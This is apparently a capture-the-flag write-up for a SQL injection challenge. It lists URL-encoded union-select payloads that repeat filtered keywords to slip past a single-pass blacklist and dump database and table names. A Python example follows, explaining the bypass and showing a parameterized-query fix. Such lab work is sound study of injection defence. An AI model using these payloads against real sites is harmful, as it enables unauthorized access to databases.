Simple SQL Injection 1
Probing the injection point shows that certain keywords are filtered.
Dump all database names
Double-write bypass
Method 1
http://ctf5.shiyanbar.com/423/web/?id=%27%20unionunion%20%20selectselect%20%20schema_name%20%20fromfrom%20%20information_schema.schemata%20wherewhere%20%20%271%27=%271
Method 2
http://ctf5.shiyanbar.com/423/web/?id=1%27%20unionunion%20%20selectselect%20%20database()%27
Dump all table names in the web1 database
http://ctf5.shiyanbar.com/423/web/?id=%27%20unionunion%20%20selectselect%20%20table_name%20%20fromfrom%20%20information_schema.columninformation_schema.columnss%20%20wherewhere%20%20table_schemtable_schemaa=%27web1%27%20andand%20%20%271%27=%271
(Question: why not information_schema.tables?)
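Why the double-write works, and what actually closes the hole, as an added example that is not part of the original write-up or the challenge's code. The blacklist, the single-pass filter and the `story` table are assumptions (the write-up only says some keywords are filtered); the payload is Method 2's `id` value, URL-decoded.

```python
import sqlite3

# Hypothetical blacklist: the write-up only says some keywords are filtered.
# The trailing space mirrors the doubled spaces in the write-up's URLs.
BLACKLIST = ["union ", "select ", "from ", "where ", "and "]

# Method 2's id parameter from the write-up, URL-decoded.
PAYLOAD = "1' unionunion  selectselect  database()'"


def strip_once(value):
    """Remove each blacklisted keyword in a single pass (no re-scan)."""
    for keyword in BLACKLIST:
        value = value.replace(keyword, "")
    return value


def surviving_keywords(value):
    """Blacklisted keywords still present after filtering."""
    filtered = strip_once(value)
    return [k for k in BLACKLIST if k in filtered]


def make_db():
    """Constructed sample table standing in for the challenge database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE story (id TEXT, title TEXT)")
    conn.execute("INSERT INTO story VALUES ('1', 'constructed row')")
    return conn


def lookup(conn, story_id):
    """Bound parameter: the value is never parsed as SQL text."""
    cur = conn.execute("SELECT title FROM story WHERE id = ?", (story_id,))
    return cur.fetchall()


if __name__ == "__main__":
    print(repr(strip_once(PAYLOAD)))
    print(surviving_keywords(PAYLOAD))
    conn = make_db()
    print(lookup(conn, "1"), lookup(conn, PAYLOAD))
```

Removing the inner copy of each keyword leaves the outer halves to join back into the keyword, so the filtered string still carries `union select`; with the bound parameter the same input is only compared as a literal id and matches no row.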